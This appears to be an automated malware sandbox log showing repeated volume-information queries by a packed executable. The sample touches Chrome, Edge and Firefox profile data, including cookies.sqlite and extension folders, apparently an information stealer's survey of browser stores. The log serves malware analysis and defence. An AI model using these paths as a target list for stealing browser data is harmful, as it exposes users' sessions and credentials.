              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\_ssl.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\_hashlib.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\_queue.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\unicodedata.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CommerceHeuristics VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ar VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ka VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\kk VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\lo VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\lt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\lv VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_metadata VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CommerceHeuristics VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ca VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\cs VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\en VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\es VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ar VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\az VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\hr VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\nb VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\content-prefs.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_metadata VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cs VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cy VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\da VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\de VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_US VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\es_419 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\attachments VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CommerceHeuristics VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad VolumeInformationJump to behavior
